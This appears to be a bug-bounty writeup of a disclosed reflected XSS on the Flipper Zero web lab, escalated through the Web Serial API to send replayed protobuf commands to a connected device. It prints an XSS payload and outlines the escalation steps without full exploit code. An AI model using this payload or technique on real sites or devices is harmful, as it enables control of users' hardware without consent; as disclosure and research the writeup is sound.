Got RCE through an XSS on lab.flipper.net, here's the writeup
PoC Video, printing 1337 on the screen
Was installing the unleashed firmware on my flipper and notice that the "channel" parameter was being reflected on the dropdown. Being the nerd I am, injected an
<img/src/onerror=alert(1)> (https://tinyxss.terjanq.me/) tag and boom XSS
The vulnerability occurs because of the "v-html" directive of Vue.js on the page
<q-item-label v-html="scope.opt.label" />
alert() is boring, let's get RCE! The website is used to interface with your Flipper Zero install new apps, update the firmware, etc. This is done using the Web Serial API, an experimental API to read/write serial devices, what could go wrong?
The website has to ask the user for permission to connect, like for the webcam, but we can assume that the user already accepted because the XSS won't show if the flipper isn't connected. So I went to read how the serial communication is done on https://github.com/flipperdevices/lab.flipper.net
Looks like if we can execute
screenFrame(data) the application will send a command to flipper display on the screen, which is enough for the PoC. The problem was that everything was wrapped with Webpack. Spent a lot of time debugging trying to find globally accessible objects and oh boi was impossible (accepting tips). Having gave up to use the app's own code, I had to made my payload to directly communicate via serial with flipper.
So I just open a
navigator.serial.getPorts() and communicate with it, right? Wrong, the port is already being used and I can't get the reference of it because of Webpack. My workaround was to disconnect it and connect again, doing a
.click() on the disconnect button (fuck webpack) Now we just need to send the right data to the flipper aaaaaaand ... the protocol is undocumented, nice. It uses ProtoBuf which is not that hard to understand but what an overkill of a protocol does flipper have gosh (actually amazing). https://github.com/flipperdevices/flipperzero-protobuf
To simplify the PoC I just did all the steps on the application itself and
console.log() the shit out of it, had to use HTTP Mock to change the js to properly get all the "packets" since it was too fast. Also had to manually edit the 3rd byte of every packet on the final payload, because it's incremental (guessing powers), btw every connection begins with
start_rpc_session\r. Not sure what every byte is, but the biggest byte array is a bmp representation of the
1337 on screen. Then just replayed the data to the serial.
What a wonderful era we live in, where XSS can get you RCE on an embedded device (ಥ﹏ಥ)
Shout out to hunter.dev for dealing with the disclosure process. https://huntr.dev/bounties/03ce4392-c715-4127-af9b-e647d64fdd38/